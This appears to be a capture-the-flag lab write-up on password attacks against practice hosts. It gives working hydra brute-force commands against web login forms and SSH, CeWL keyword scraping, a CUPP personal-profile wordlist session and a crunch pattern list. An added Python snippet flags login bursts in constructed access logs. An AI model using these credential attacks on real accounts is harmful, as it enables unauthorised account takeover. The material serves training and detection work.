Challenge 1:
Marco deployed a firewall at firewall.thm:5001 but kept default credentials.
Used this command to get the password:
hydra -l admin -P /usr/share/wordlists/rockyou.txt -f -V -t 4 10.48.180.224 -s 5001 http-post-form '/login:username=^USER^&password=^PASS^:F=Invalid credentials'
From the page source we got the form parameters ->
And for an incorrect password it showed "Invalid credentials", which is the failure string hydra matches on.
Challenge 2:
Marco built an internal Employee Login panel on jobs.thm:5002 and used common company keywords as passwords.
We use CeWL to gather keywords from the site:
┌──(kali㉿kali)-[~/Try_Hack_Me/Challenges]
└─$ cewl --lowercase http://10.48.180.224:5002/ > passwords.txt
┌──(kali㉿kali)-[~/Try_Hack_Me/Challenges]
└─$ hydra -l marco -P passwords.txt -f -V -t 4 10.48.180.224 -s 5002 http-post-form '/login:username=^USER^&password=^PASS^:F=Invalid credentials'
Challenge 3:
Navigate to social.thm:5003 and derive Marco's password from personal info.
To build a wordlist from that personal information, CUPP is the best tool:
┌──(kali㉿kali)-[~/Try_Hack_Me/Challenges]
└─$ cupp -i
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: Marco
> Surname: Bianchi
> Nickname: marky
> Birthdate (DDMMYYYY): 14021995
> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):
> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):
> Pet's name:
> Company name:
> Do you want to add some key words about the victim? Y/[N]: N
> Do you want to add special chars at the end of words? Y/[N]: N
> Do you want to add some random numbers at the end of words? Y/[N]:N
> Leet mode? (i.e. leet = 1337) Y/[N]: N
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to marco.txt, counting 2816 words.
[+] Now load your pistolero with marco.txt and shoot! Good luck!
Then used this command ->
hydra -l marco -P marco.txt -f -V -t 4 10.48.180.224 -s 5003 http-post-form '/login:username=^USER^&password=^PASS^:F=Invalid credentials'
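On the server side, the form brute-forcing in Challenges 1 to 3 shows up as a tight burst of POST /login requests from a single client, whatever the response body says. As an added example that is not part of this writeup, here is a small Python detector over constructed access-log lines; the IPs, timestamps, User-Agent strings and the 10-attempts-per-60-seconds threshold are all assumptions made up for the sample.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample in Combined Log Format (not captured from the challenge host):
# one legitimate client, one client hammering POST /login once per second.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Feb/2025:10:00:00 +0000] "GET /login HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [14/Feb/2025:10:00:01 +0000] "POST /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [14/Feb/2025:10:05:30 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    "this line is deliberately malformed and must be skipped",
] + [
    f'10.0.0.9 - - [14/Feb/2025:10:00:{s:02d} +0000] "POST /login HTTP/1.1" 200 512 "-" "Mozilla/5.0 (tool)"'
    for s in range(12)
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Parse one access-log line; return a dict, or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def find_login_bursts(lines, threshold=10, window_s=60):
    """Return {ip: peak} for clients whose POST /login count within any
    window_s-second sliding window exceeds threshold."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == "/login":
            attempts[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in attempts.items():
        window, peak = deque(), 0
        for t in sorted(times):  # oldest first so the window slides forward
            window.append(t)
            while (t - window[0]).total_seconds() > window_s:
                window.popleft()
            peak = max(peak, len(window))
        if peak > threshold:
            flagged[ip] = peak
    return flagged
```

A flagged source is a candidate for rate limiting or temporary lockout; the legitimate client's two spaced-out attempts never cross the threshold.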
Challenge 4:
On social.thm:5003, Marco recently uploaded a new profile picture. For privacy and storage consistency, the platform automatically renames uploaded files to the SHA256 hash of the original filename and saves them in the format (SHA256).png. Your task is to identify the original filename of Marco’s uploaded profile picture. Submit only the filename to proceed.
After logging in with those credentials we got this interface ->

When we opened his profile picture, we noticed the file name is a SHA-256 hash.
Challenge 5:
Marco has revealed his password pattern on social.thm:5003, using predictable rules based on keywords and formatting. Use this information to generate a targeted wordlist and brute-force the SSH service with username marco.
Now notice Marco's post, and also the hotel name "oliver" ->

But "oliver" is not the company keyword Marco was indicating; he was pointing at the "security" keyword under his post ->
So used these 2 commands ->
crunch 13 13 -t Security20%%! -o marco_wordlist.txt
hydra -l marco -P marco_wordlist.txt ssh://10.48.180.224